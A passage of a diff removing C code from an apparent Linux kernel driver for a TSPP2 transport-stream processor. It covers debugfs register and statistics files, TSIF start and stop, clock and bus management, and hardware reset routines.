-- seq_printf(s, "filter_tsp_no_payload = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_TSP_NO_PAYLOAD(filter->context)));
-- seq_printf(s, "filter_tsp_duplicate = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_TSP_DUPLICATE(filter->context)));
-- seq_printf(s, "filter_key_fetch_fail = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_KEY_FETCH_FAILURE(filter->context)));
-- seq_printf(s, "filter_dropped_pcr = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_DROPPED_PCR(filter->context)));
-- seq_printf(s, "filter_pes_errors = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_PES_ERRORS(filter->context)));
-- }
--
-- return 0;
--}
--
--/**
-- * debugfs service to print pipe information.
-- */
--static int pipe_debugfs_print(struct seq_file *s, void *p)
--{
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)s->private;
-- seq_printf(s, "hw_index: %d\n", pipe->hw_index);
-- seq_printf(s, "iova: 0x%08X\n", pipe->iova);
-- seq_printf(s, "threshold: %d\n", pipe->threshold);
-- seq_printf(s, "Status: %s\n", pipe->opened ? "opened" : "closed");
-- seq_printf(s, "ref_cnt: %d\n", pipe->ref_cnt);
-- return 0;
--}
--
--static int tspp2_dev_dbgfs_open(struct inode *inode, struct file *file)
--{
-- return single_open(file, tspp2_device_debugfs_print,
-- inode->i_private);
--}
--
--static int tspp2_filter_dbgfs_open(struct inode *inode, struct file *file)
--{
-- return single_open(file, filter_debugfs_print, inode->i_private);
--}
--
--static int tspp2_pipe_dbgfs_open(struct inode *inode, struct file *file)
--{
-- return single_open(file, pipe_debugfs_print, inode->i_private);
--}
--
--static int tspp2_src_dbgfs_open(struct inode *inode, struct file *file)
--{
-- return single_open(file, tspp2_src_debugfs_print, inode->i_private);
--}
--
--static const struct file_operations dbgfs_tspp2_device_fops = {
-- .open = tspp2_dev_dbgfs_open,
-- .read = seq_read,
-- .llseek = seq_lseek,
-- .release = single_release,
-- .owner = THIS_MODULE,
--};
--
--static const struct file_operations dbgfs_filter_fops = {
-- .open = tspp2_filter_dbgfs_open,
-- .read = seq_read,
-- .llseek = seq_lseek,
-- .release = single_release,
-- .owner = THIS_MODULE,
--};
--
--static const struct file_operations dbgfs_pipe_fops = {
-- .open = tspp2_pipe_dbgfs_open,
-- .read = seq_read,
-- .llseek = seq_lseek,
-- .release = single_release,
-- .owner = THIS_MODULE,
--};
--
--static const struct file_operations dbgfs_src_fops = {
-- .open = tspp2_src_dbgfs_open,
-- .read = seq_read,
-- .llseek = seq_lseek,
-- .release = single_release,
-- .owner = THIS_MODULE,
--};
--
--/**
-- * tspp2_tsif_debugfs_exit() - TSIF device debugfs teardown.
-- *
-- * @tsif_device: TSIF device.
-- */
--static void tspp2_tsif_debugfs_exit(struct tspp2_tsif_device *tsif_device)
--{
-- debugfs_remove_recursive(tsif_device->debugfs_entry);
-- tsif_device->debugfs_entry = NULL;
--}
--
--/**
-- * tspp2_debugfs_init() - TSPP2 device debugfs initialization.
-- *
-- * @device: TSPP2 device.
-- */
--static void tspp2_debugfs_init(struct tspp2_device *device)
--{
-- int i, j;
-- char name[80];
-- struct dentry *dentry;
-- struct dentry *dir;
-- void __iomem *base = device->base;
--
-- snprintf(name, 80, "tspp2_%i", device->dev_id);
-- device->debugfs_entry = debugfs_create_dir(name, NULL);
--
-- if (!device->debugfs_entry)
-- return;
--
-- /* Support device open/close */
-- debugfs_create_file("open", TSPP2_S_RW, device->debugfs_entry,
-- NULL, &fops_device_open);
--
-- dentry = debugfs_create_dir("regs", device->debugfs_entry);
-- if (dentry) {
-- for (i = 0; i < ARRAY_SIZE(tspp2_regs); i++) {
-- debugfs_create_file(
-- tspp2_regs[i].name,
-- tspp2_regs[i].mode,
-- dentry,
-- base + tspp2_regs[i].offset,
-- &fops_iomem_x32);
-- }
-- }
--
-- dentry = debugfs_create_dir("statistics", device->debugfs_entry);
-- if (dentry) {
-- debugfs_create_u32(
-- "stat_tsp_invalid_af_control",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.global.tsp_invalid_af_control);
--
-- debugfs_create_u32(
-- "stat_tsp_invalid_length",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.global.tsp_invalid_length);
--
-- debugfs_create_u32(
-- "stat_pes_no_sync",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.global.pes_no_sync);
--
-- debugfs_create_u32(
-- "stat_encrypt_level_err",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.global.encrypt_level_err);
-- }
--
-- dir = debugfs_create_dir("counters", device->debugfs_entry);
-- for (i = 0; i < TSPP2_NUM_CONTEXTS; i++) {
-- snprintf(name, 80, "context%03i", i);
-- dentry = debugfs_create_dir(name, dir);
-- if (dentry) {
-- debugfs_create_file("filter_tsp_sync_err",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_TSP_SYNC_ERROR(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_erred_tsp",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_ERRED_TSP(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_discontinuities",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_DISCONTINUITIES(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_sc_bits_discard",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_SCRAMBLING_BITS_DISCARD(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_tsp_total_num",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_TSP_TOTAL_NUM(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_discont_indicator",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_DISCONT_INDICATOR(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_tsp_no_payload",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_TSP_NO_PAYLOAD(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_tsp_duplicate",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_TSP_DUPLICATE(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_key_fetch_fail",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_KEY_FETCH_FAILURE(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_dropped_pcr",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_DROPPED_PCR(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_pes_errors",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_PES_ERRORS(i),
-- &fops_iomem_x32);
--
-- debugfs_create_u32(
-- "stat_sc_go_high",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.ctx[i].sc_go_high);
--
-- debugfs_create_u32(
-- "stat_sc_go_low",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.ctx[i].sc_go_low);
-- }
-- }
--
-- dir = debugfs_create_dir("filters", device->debugfs_entry);
-- for (i = 0; i < TSPP2_NUM_HW_FILTERS; i++) {
-- snprintf(name, 80, "filter%03i", i);
-- dentry = debugfs_create_dir(name, dir);
-- if (dentry) {
-- debugfs_create_file("filter_entry0",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_ENTRY0(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("filter_entry1",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_FILTER_ENTRY1(i),
-- &fops_iomem_x32);
--
-- for (j = 0; j < TSPP2_MAX_OPS_PER_FILTER; j++) {
-- snprintf(name, 80, "opcode%02i", j);
-- debugfs_create_file(name,
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_OPCODE(i, j),
-- &fops_iomem_x32);
-- }
-- }
-- }
--
-- dir = debugfs_create_dir("mem_sources", device->debugfs_entry);
-- for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
-- snprintf(name, 80, "mem_src%i", i);
-- dentry = debugfs_create_dir(name, dir);
-- if (dentry) {
-- debugfs_create_u32(
-- "stat_read_failure",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.src[i].read_failure);
--
-- debugfs_create_u32(
-- "stat_flow_control_stall",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.src[i].flow_control_stall);
-- }
-- }
--
-- dir = debugfs_create_dir("key_tables", device->debugfs_entry);
-- for (i = 0; i < TSPP2_NUM_KEYTABLES; i++) {
-- snprintf(name, 80, "key_table%02i", i);
-- dentry = debugfs_create_dir(name, dir);
-- if (dentry) {
-- debugfs_create_u32(
-- "stat_key_not_ready",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.kt[i].key_not_ready);
-- }
-- }
--
-- dir = debugfs_create_dir("pipes", device->debugfs_entry);
-- for (i = 0; i < TSPP2_NUM_PIPES; i++) {
-- snprintf(name, 80, "pipe%02i", i);
-- dentry = debugfs_create_dir(name, dir);
-- if (dentry) {
-- debugfs_create_file("threshold",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_PIPE_THRESH_CONFIG(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("last_address",
-- S_IRUGO,
-- dentry,
-- base + TSPP2_PIPE_LAST_ADDRESS(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("data_not_sent",
-- S_IRUGO,
-- dentry,
-- base + TSPP2_DATA_NOT_SENT_ON_PIPE(i),
-- &fops_iomem_x32);
--
-- debugfs_create_u32(
-- "stat_unexpected_reset",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.pipe[i].unexpected_reset);
--
-- debugfs_create_u32(
-- "stat_qsb_response_error",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.pipe[i].qsb_response_error);
--
-- debugfs_create_u32(
-- "stat_wrong_pipe_direction",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &device->irq_stats.pipe[i].
-- wrong_pipe_direction);
-- }
-- }
--
-- dir = debugfs_create_dir("indexing_tables", device->debugfs_entry);
-- for (i = 0; i < TSPP2_NUM_INDEXING_TABLES; i++) {
-- snprintf(name, 80, "indexing_table%i", i);
-- dentry = debugfs_create_dir(name, dir);
-- if (dentry) {
-- debugfs_create_file("prefix",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_INDEX_TABLE_PREFIX(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("mask",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_INDEX_TABLE_PREFIX_MASK(i),
-- &fops_iomem_x32);
--
-- debugfs_create_file("parameters",
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_INDEX_TABLE_PARAMS(i),
-- &fops_iomem_x32);
--
-- for (j = 0; j < TSPP2_NUM_INDEXING_PATTERNS; j++) {
-- snprintf(name, 80, "pattern_%02i", j);
-- debugfs_create_file(name,
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_INDEX_TABLE_PATTEREN(i, j),
-- &fops_iomem_x32);
--
-- snprintf(name, 80, "mask_%02i", j);
-- debugfs_create_file(name,
-- TSPP2_S_RW,
-- dentry,
-- base + TSPP2_INDEX_TABLE_MASK(i, j),
-- &fops_iomem_x32);
-- }
-- }
-- }
-- dir = debugfs_create_dir("software", device->debugfs_entry);
-- debugfs_create_file("device", S_IRUGO, dir, device,
-- &dbgfs_tspp2_device_fops);
--
-- dentry = debugfs_create_dir("filters", dir);
-- if (dentry) {
-- for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++) {
-- snprintf(name, 20, "filter%03i", i);
-- debugfs_create_file(name, S_IRUGO, dentry,
-- &(device->filters[i]), &dbgfs_filter_fops);
-- }
-- }
--
-- dentry = debugfs_create_dir("pipes", dir);
-- if (dentry) {
-- for (i = 0; i < TSPP2_NUM_PIPES; i++) {
-- snprintf(name, 20, "pipe%02i", i);
-- debugfs_create_file(name, S_IRUGO, dentry,
-- &(device->pipes[i]), &dbgfs_pipe_fops);
-- }
-- }
--
-- dentry = debugfs_create_dir("sources", dir);
-- if (dentry) {
-- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) {
-- snprintf(name, 20, "tsif%d", i);
-- debugfs_create_file(name, S_IRUGO, dentry,
-- &(device->tsif_sources[i]), &dbgfs_src_fops);
-- }
-- for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
-- snprintf(name, 20, "mem%d", i);
-- debugfs_create_file(name, S_IRUGO, dentry,
-- &(device->mem_sources[i]), &dbgfs_src_fops);
-- }
-- }
--}
--
--/**
-- * tspp2_debugfs_exit() - TSPP2 device debugfs teardown.
-- *
-- * @device: TSPP2 device.
-- */
--static void tspp2_debugfs_exit(struct tspp2_device *device)
--{
-- debugfs_remove_recursive(device->debugfs_entry);
-- device->debugfs_entry = NULL;
--}
--
--/**
-- * tspp2_tsif_start() - Start TSIF device HW.
-- *
-- * @tsif_device: TSIF device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_tsif_start(struct tspp2_tsif_device *tsif_device)
--{
-- u32 ctl;
--
-- if (tsif_device->ref_count > 0)
-- return 0;
--
-- ctl = (TSIF_STS_CTL_EN_IRQ | TSIF_STS_CTL_EN_DM |
-- TSIF_STS_CTL_PACK_AVAIL | TSIF_STS_CTL_OVERFLOW |
-- TSIF_STS_CTL_LOST_SYNC | TSIF_STS_CTL_TIMEOUT |
-- TSIF_STS_CTL_PARALLEL);
--
-- if (tsif_device->clock_inverse)
-- ctl |= TSIF_STS_CTL_INV_CLOCK;
--
-- if (tsif_device->data_inverse)
-- ctl |= TSIF_STS_CTL_INV_DATA;
--
-- if (tsif_device->sync_inverse)
-- ctl |= TSIF_STS_CTL_INV_SYNC;
--
-- if (tsif_device->enable_inverse)
-- ctl |= TSIF_STS_CTL_INV_ENABLE;
--
-- switch (tsif_device->mode) {
-- case TSPP2_TSIF_MODE_LOOPBACK:
-- ctl |= TSIF_STS_CTL_EN_NULL |
-- TSIF_STS_CTL_EN_ERROR |
-- TSIF_STS_CTL_TEST_MODE;
-- break;
-- case TSPP2_TSIF_MODE_1:
-- ctl |= TSIF_STS_CTL_EN_TIME_LIM | TSIF_STS_CTL_EN_TCR;
-- break;
-- case TSPP2_TSIF_MODE_2:
-- ctl |= TSIF_STS_CTL_EN_TIME_LIM |
-- TSIF_STS_CTL_EN_TCR |
-- TSIF_STS_CTL_MODE_2;
-- break;
-- default:
-- pr_warn("%s: Unknown TSIF mode %d, setting to TSPP2_TSIF_MODE_2\n",
-- __func__, tsif_device->mode);
-- ctl |= TSIF_STS_CTL_EN_TIME_LIM |
-- TSIF_STS_CTL_EN_TCR |
-- TSIF_STS_CTL_MODE_2;
-- break;
-- }
--
-- writel_relaxed(ctl, tsif_device->base + TSPP2_TSIF_STS_CTL);
-- writel_relaxed(tsif_device->time_limit,
-- tsif_device->base + TSPP2_TSIF_TIME_LIMIT);
-- wmb();
-- writel_relaxed(ctl | TSIF_STS_CTL_START,
-- tsif_device->base + TSPP2_TSIF_STS_CTL);
-- wmb();
--
-- ctl = readl_relaxed(tsif_device->base + TSPP2_TSIF_STS_CTL);
-- if (ctl & TSIF_STS_CTL_START)
-- tsif_device->ref_count++;
--
-- return (ctl & TSIF_STS_CTL_START) ? 0 : -EBUSY;
--}
--
--
--static int tspp2_vbif_clock_start(struct tspp2_device *device)
--{
-- int ret;
--
-- if (device->tspp2_vbif_clk) {
-- ret = clk_prepare_enable(device->tspp2_vbif_clk);
-- if (ret) {
-- pr_err("%s: Can't start tspp2_vbif_clk\n", __func__);
-- return ret;
-- }
-- }
--
-- if (device->vbif_ahb_clk) {
-- ret = clk_prepare_enable(device->vbif_ahb_clk);
-- if (ret) {
-- pr_err("%s: Can't start vbif_ahb_clk\n", __func__);
-- goto disable_vbif_tspp2;
-- }
-- }
-- if (device->vbif_axi_clk) {
-- ret = clk_prepare_enable(device->vbif_axi_clk);
-- if (ret) {
-- pr_err("%s: Can't start vbif_ahb_clk\n", __func__);
-- goto disable_vbif_ahb;
-- }
-- }
--
-- return 0;
--
--disable_vbif_ahb:
-- if (device->vbif_ahb_clk)
-- clk_disable_unprepare(device->vbif_ahb_clk);
--disable_vbif_tspp2:
-- if (device->tspp2_vbif_clk)
-- clk_disable_unprepare(device->tspp2_vbif_clk);
--
-- return ret;
--}
--
--static void tspp2_vbif_clock_stop(struct tspp2_device *device)
--{
-- if (device->tspp2_vbif_clk)
-- clk_disable_unprepare(device->tspp2_vbif_clk);
--
-- if (device->vbif_ahb_clk)
-- clk_disable_unprepare(device->vbif_ahb_clk);
--
-- if (device->vbif_axi_clk)
-- clk_disable_unprepare(device->vbif_axi_clk);
--}
--
--/**
-- * tspp2_tsif_stop() - Stop TSIF device HW.
-- *
-- * @tsif_device: TSIF device.
-- */
--static void tspp2_tsif_stop(struct tspp2_tsif_device *tsif_device)
--{
-- if (tsif_device->ref_count == 0)
-- return;
--
-- tsif_device->ref_count--;
--
-- if (tsif_device->ref_count == 0) {
-- writel_relaxed(TSIF_STS_CTL_STOP,
-- tsif_device->base + TSPP2_TSIF_STS_CTL);
-- /*
-- * The driver assumes that after this point the TSIF is stopped,
-- * so a memory barrier is required to allow
-- * further register writes.
-- */
-- wmb();
-- }
--}
--
--/* Clock functions */
--
--static int tspp2_reg_clock_start(struct tspp2_device *device)
--{
-- int rc;
--
-- if (device->tspp2_ahb_clk &&
-- clk_prepare_enable(device->tspp2_ahb_clk) != 0) {
-- pr_err("%s: Can't start tspp2_ahb_clk\n", __func__);
-- return -EBUSY;
-- }
--
-- if (device->tspp2_core_clk &&
-- clk_prepare_enable(device->tspp2_core_clk) != 0) {
-- pr_err("%s: Can't start tspp2_core_clk\n", __func__);
-- if (device->tspp2_ahb_clk)
-- clk_disable_unprepare(device->tspp2_ahb_clk);
-- return -EBUSY;
-- }
--
-- /* Request minimal bandwidth on the bus, required for register access */
-- if (device->bus_client) {
-- rc = msm_bus_scale_client_update_request(device->bus_client, 1);
-- if (rc) {
-- pr_err("%s: Can't enable bus\n", __func__);
-- if (device->tspp2_core_clk)
-- clk_disable_unprepare(device->tspp2_core_clk);
-- if (device->tspp2_ahb_clk)
-- clk_disable_unprepare(device->tspp2_ahb_clk);
-- return -EBUSY;
-- }
-- }
--
-- return 0;
--}
--
--static int tspp2_reg_clock_stop(struct tspp2_device *device)
--{
-- /* Minimize bandwidth bus voting */
-- if (device->bus_client)
-- msm_bus_scale_client_update_request(device->bus_client, 0);
--
-- if (device->tspp2_core_clk)
-- clk_disable_unprepare(device->tspp2_core_clk);
--
-- if (device->tspp2_ahb_clk)
-- clk_disable_unprepare(device->tspp2_ahb_clk);
--
-- return 0;
--}
--
--/**
-- * tspp2_clock_start() - Enable the required TSPP2 clocks
-- *
-- * @device: The TSPP2 device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_clock_start(struct tspp2_device *device)
--{
-- int tspp2_ahb_clk = 0;
-- int tspp2_core_clk = 0;
-- int tspp2_vbif_clk = 0;
-- int tspp2_klm_ahb_clk = 0;
-- int tsif_ref_clk = 0;
--
-- if (device == NULL) {
-- pr_err("%s: Can't start clocks, invalid device\n", __func__);
-- return -EINVAL;
-- }
--
-- if (device->tspp2_ahb_clk) {
-- if (clk_prepare_enable(device->tspp2_ahb_clk) != 0) {
-- pr_err("%s: Can't start tspp2_ahb_clk\n", __func__);
-- goto err_clocks;
-- }
-- tspp2_ahb_clk = 1;
-- }
--
-- if (device->tspp2_core_clk) {
-- if (clk_prepare_enable(device->tspp2_core_clk) != 0) {
-- pr_err("%s: Can't start tspp2_core_clk\n", __func__);
-- goto err_clocks;
-- }
-- tspp2_core_clk = 1;
-- }
--
-- if (device->tspp2_klm_ahb_clk) {
-- if (clk_prepare_enable(device->tspp2_klm_ahb_clk) != 0) {
-- pr_err("%s: Can't start tspp2_klm_ahb_clk\n", __func__);
-- goto err_clocks;
-- }
-- tspp2_klm_ahb_clk = 1;
-- }
--
-- if (device->tsif_ref_clk) {
-- if (clk_prepare_enable(device->tsif_ref_clk) != 0) {
-- pr_err("%s: Can't start tsif_ref_clk\n", __func__);
-- goto err_clocks;
-- }
-- tsif_ref_clk = 1;
-- }
--
-- /* Request Max bandwidth on the bus, required for full operation */
-- if (device->bus_client &&
-- msm_bus_scale_client_update_request(device->bus_client, 2)) {
-- pr_err("%s: Can't enable bus\n", __func__);
-- goto err_clocks;
-- }
--
-- return 0;
--
--err_clocks:
-- if (tspp2_ahb_clk)
-- clk_disable_unprepare(device->tspp2_ahb_clk);
--
-- if (tspp2_core_clk)
-- clk_disable_unprepare(device->tspp2_core_clk);
--
-- if (tspp2_vbif_clk)
-- clk_disable_unprepare(device->tspp2_vbif_clk);
--
-- if (tspp2_klm_ahb_clk)
-- clk_disable_unprepare(device->tspp2_klm_ahb_clk);
--
-- if (tsif_ref_clk)
-- clk_disable_unprepare(device->tsif_ref_clk);
--
-- return -EBUSY;
--}
--
--/**
-- * tspp2_clock_stop() - Disable TSPP2 clocks
-- *
-- * @device: The TSPP2 device.
-- */
--static void tspp2_clock_stop(struct tspp2_device *device)
--{
-- if (device == NULL) {
-- pr_err("%s: Can't stop clocks, invalid device\n", __func__);
-- return;
-- }
--
-- /* Minimize bandwidth bus voting */
-- if (device->bus_client)
-- msm_bus_scale_client_update_request(device->bus_client, 0);
--
-- if (device->tsif_ref_clk)
-- clk_disable_unprepare(device->tsif_ref_clk);
--
-- if (device->tspp2_klm_ahb_clk)
-- clk_disable_unprepare(device->tspp2_klm_ahb_clk);
--
-- if (device->tspp2_core_clk)
-- clk_disable_unprepare(device->tspp2_core_clk);
--
-- if (device->tspp2_ahb_clk)
-- clk_disable_unprepare(device->tspp2_ahb_clk);
--}
--
--/**
-- * tspp2_filter_counters_reset() - Reset a filter's HW counters.
-- *
-- * @device: TSPP2 device.
-- * @index: Filter context index. Note counters are based on the context
-- * index and not on the filter HW index.
-- */
--static void tspp2_filter_counters_reset(struct tspp2_device *device, u32 index)
--{
-- /* Reset filter counters */
-- writel_relaxed(0, device->base + TSPP2_FILTER_TSP_SYNC_ERROR(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_ERRED_TSP(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_DISCONTINUITIES(index));
-- writel_relaxed(0,
-- device->base + TSPP2_FILTER_SCRAMBLING_BITS_DISCARD(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_TSP_TOTAL_NUM(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_DISCONT_INDICATOR(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_TSP_NO_PAYLOAD(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_TSP_DUPLICATE(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_KEY_FETCH_FAILURE(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_DROPPED_PCR(index));
-- writel_relaxed(0, device->base + TSPP2_FILTER_PES_ERRORS(index));
--}
--
--/**
-- * tspp2_global_hw_reset() - Reset TSPP2 device registers to a default state.
-- *
-- * @device: TSPP2 device.
-- * @enable_intr: Enable specific interrupts or disable them.
-- * -- * A helper function called from probe() and remove(), this function resets both -- * TSIF devices' SW structures and verifies the TSIF HW is stopped. It resets -- * TSPP2 registers to appropriate default values and makes sure to disable -- * all sources, filters etc. Finally, it clears all interrupts and unmasks -- * the "important" interrupts. -- * -- * Return 0 on success, error value otherwise. -- */ --static int tspp2_global_hw_reset(struct tspp2_device *device, -- int enable_intr) --{ -- int i, n; -- unsigned long rate_in_hz = 0; -- u32 global_irq_en = 0; -- -- if (!device) { -- pr_err("%s: NULL device\n", __func__); -- return -ENODEV; -- } -- -- /* Stop TSIF devices */ -- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) { -- device->tsif_devices[i].hw_index = i; -- device->tsif_devices[i].dev = device; -- device->tsif_devices[i].mode = TSPP2_TSIF_MODE_2; -- device->tsif_devices[i].clock_inverse = 0; -- device->tsif_devices[i].data_inverse = 0; -- device->tsif_devices[i].sync_inverse = 0; -- device->tsif_devices[i].enable_inverse = 0; -- device->tsif_devices[i].stat_pkt_write_err = 0; -- device->tsif_devices[i].stat_pkt_read_err = 0; -- device->tsif_devices[i].stat_overflow = 0; -- device->tsif_devices[i].stat_lost_sync = 0; -- device->tsif_devices[i].stat_timeout = 0; -- device->tsif_devices[i].time_limit = TSPP2_TSIF_DEF_TIME_LIMIT; -- /* Set ref_count to 1 to allow stopping HW */ -- device->tsif_devices[i].ref_count = 1; -- /* This will reset ref_count to 0 */ -- tspp2_tsif_stop(&device->tsif_devices[i]); -- } -- -- /* Reset indexing table registers */ -- for (i = 0; i < TSPP2_NUM_INDEXING_TABLES; i++) { -- writel_relaxed(0, device->base + TSPP2_INDEX_TABLE_PREFIX(i)); -- writel_relaxed(0, -- device->base + TSPP2_INDEX_TABLE_PREFIX_MASK(i)); -- for (n = 0; n < TSPP2_NUM_INDEXING_PATTERNS; n++) { -- writel_relaxed(0, device->base + -- TSPP2_INDEX_TABLE_PATTEREN(i, n)); -- writel_relaxed(0, -- device->base + TSPP2_INDEX_TABLE_MASK(i, n)); -- } -- /* Set 
number of patterns to 0, prefix size to 4 by default */ -- writel_relaxed(0x00000400, -- device->base + TSPP2_INDEX_TABLE_PARAMS(i)); -- } -- -- /* Disable TSIF inputs. Set mode of operation to 16 batches */ -- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) -- writel_relaxed((0x1 << TSIF_INPUT_SRC_CONFIG_16_BATCHES_OFFS), -- device->base + TSPP2_TSIF_INPUT_SRC_CONFIG(i)); -- -- /* Reset source related registers and performance counters */ -- for (i = 0; i < TSPP2_NUM_ALL_INPUTS; i++) { -- writel_relaxed(0, device->base + TSPP2_SRC_DEST_PIPES(i)); -- -- /* Set source configuration to default values */ -- writel_relaxed(TSPP2_DEFAULT_SRC_CONFIG, -- device->base + TSPP2_SRC_CONFIG(i)); -- } -- writel_relaxed(0x000003FF, device->base + TSPP2_SRC_TOTAL_TSP_RESET); -- writel_relaxed(0x000003FF, -- device->base + TSPP2_SRC_FILTERED_OUT_TSP_RESET); -- -- /* Reset all contexts, each register handles 32 contexts */ -- for (i = 0; i < 4; i++) { -- writel_relaxed(0xFFFFFFFF, -- device->base + TSPP2_TSP_CONTEXT_RESET(i)); -- writel_relaxed(0xFFFFFFFF, -- device->base + TSPP2_PES_CONTEXT_RESET(i)); -- writel_relaxed(0xFFFFFFFF, -- device->base + TSPP2_INDEXING_CONTEXT_RESET(i)); -- } -- -- for (i = 0; i < TSPP2_NUM_HW_FILTERS; i++) { -- /* -- * Reset operations: put exit operation in all filter operations -- */ -- for (n = 0; n < TSPP2_MAX_OPS_PER_FILTER; n++) { -- writel_relaxed(TSPP2_OPCODE_EXIT, -- device->base + TSPP2_OPCODE(i, n)); -- } -- /* Disable all HW filters */ -- writel_relaxed(0, device->base + TSPP2_FILTER_ENTRY0(i)); -- writel_relaxed(0, device->base + TSPP2_FILTER_ENTRY1(i)); -- } -- -- for (i = 0; i < TSPP2_NUM_CONTEXTS; i++) { -- /* Reset filter context-based counters */ -- tspp2_filter_counters_reset(device, i); -- } -- -- /* -- * Disable memory inputs. Set mode of operation to 16 batches. -- * Configure last batch to be associated with all memory input sources, -- * and add a filter to match all PIDs and drop the TS packets in the -- * last HW filter entry. 
Use the last context for this filter. -- */ -- for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) -- writel_relaxed(TSPP2_DEFAULT_MEM_SRC_CONFIG, -- device->base + TSPP2_MEM_INPUT_SRC_CONFIG(i)); -- -- writel_relaxed(((TSPP2_NUM_CONTEXTS - 1) << FILTER_ENTRY1_CONTEXT_OFFS), -- device->base + TSPP2_FILTER_ENTRY1((TSPP2_NUM_HW_FILTERS - 1))); -- writel_relaxed((0x1 << FILTER_ENTRY0_EN_OFFS), -- device->base + TSPP2_FILTER_ENTRY0((TSPP2_NUM_HW_FILTERS - 1))); -- -- /* Reset pipe registers */ -- for (i = 0; i < TSPP2_NUM_PIPES; i++) -- writel_relaxed(0xFFFF, -- device->base + TSPP2_PIPE_THRESH_CONFIG(i)); -- -- writel_relaxed(0, device->base + TSPP2_PIPE_SECURITY); -- writel_relaxed(0x7FFFFFFF, -- device->base + TSPP2_DATA_NOT_SENT_ON_PIPE_RESET); -- -- /* Set global configuration to default values */ -- -- /* -- * Default: minimum time between PCRs = 50msec, STC offset is 0, -- * transmit PCR on discontinuity. -- */ -- writel_relaxed(0x00000432, device->base + TSPP2_PCR_GLOBAL_CONFIG); -- -- /* Set correct value according to TSPP2 clock: */ -- if (device->tspp2_core_clk) { -- rate_in_hz = clk_get_rate(device->tspp2_core_clk); -- writel_relaxed((rate_in_hz / MSEC_PER_SEC), -- device->base + TSPP2_CLK_TO_PCR_TIME_UNIT); -- } else { -- writel_relaxed(0x00000000, -- device->base + TSPP2_CLK_TO_PCR_TIME_UNIT); -- } -- -- writel_relaxed(0x00000000, device->base + TSPP2_DESC_WAIT_TIMEOUT); -- -- /* Clear all global interrupts */ -- writel_relaxed(0xFFFF000F, device->base + TSPP2_GLOBAL_IRQ_CLEAR); -- writel_relaxed(0x7FFFFFFF, -- device->base + 